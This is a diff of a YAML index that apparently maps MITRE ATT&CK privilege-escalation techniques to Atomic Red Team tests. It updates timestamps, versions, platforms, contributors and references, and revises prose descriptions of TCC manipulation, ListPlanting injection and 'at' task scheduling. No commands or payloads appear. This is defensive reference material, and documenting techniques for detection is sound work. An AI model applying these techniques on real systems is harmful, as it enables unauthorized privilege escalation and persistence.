@@ -21757,7 +22057,6 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -21801,7 +22100,7 @@ privilege-escalation:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -21823,7 +22122,6 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -21904,7 +22202,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -21927,7 +22224,7 @@ privilege-escalation:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -21957,12 +22254,10 @@ privilege-escalation:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -22047,7 +22342,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -22112,7 +22406,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1543.001:
@@ -22187,7 +22480,7 @@ privilege-escalation:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -22215,7 +22508,6 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1055.009:
@@ -22246,7 +22538,7 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -22289,12 +22581,10 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -22311,7 +22601,7 @@ privilege-escalation:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -22370,7 +22660,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -22452,12 +22741,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -22554,7 +22842,6 @@ privilege-escalation:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1543.002:
     technique:
@@ -22668,7 +22955,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1547.013:
@@ -22738,7 +23024,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.005:
     technique:
@@ -22766,7 +23051,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -22810,8 +23095,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.007:
     technique:
@@ -22847,7 +23130,7 @@ privilege-escalation:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -22866,12 +23149,11 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -22921,12 +23203,11 @@ privilege-escalation:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -22959,9 +23240,10 @@ privilege-escalation:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -22978,9 +23260,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -23026,38 +23307,19 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -23065,6 +23327,8 @@ privilege-escalation:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -23072,7 +23336,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -23102,7 +23366,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -23148,7 +23411,7 @@ privilege-escalation:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -23193,8 +23456,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1037.001:
     technique:
@@ -23220,7 +23481,7 @@ privilege-escalation:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -23246,59 +23507,28 @@ privilege-escalation:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -23315,6 +23545,9 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -23329,21 +23562,52 @@ privilege-escalation:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -23388,9 +23652,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -23447,8 +23710,8 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -23457,7 +23720,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.008:
     technique:
@@ -23499,7 +23761,7 @@ privilege-escalation:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -23524,12 +23786,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -23569,8 +23830,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -23578,13 +23841,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -23615,9 +23878,6 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests:
     - name: Creating GCP Service Account and Service Account Key
@@ -23680,10 +23940,10 @@ privilege-escalation:
           '
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -23746,7 +24006,7 @@ privilege-escalation:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -23780,8 +24040,8 @@ privilege-escalation:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -23790,6 +24050,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
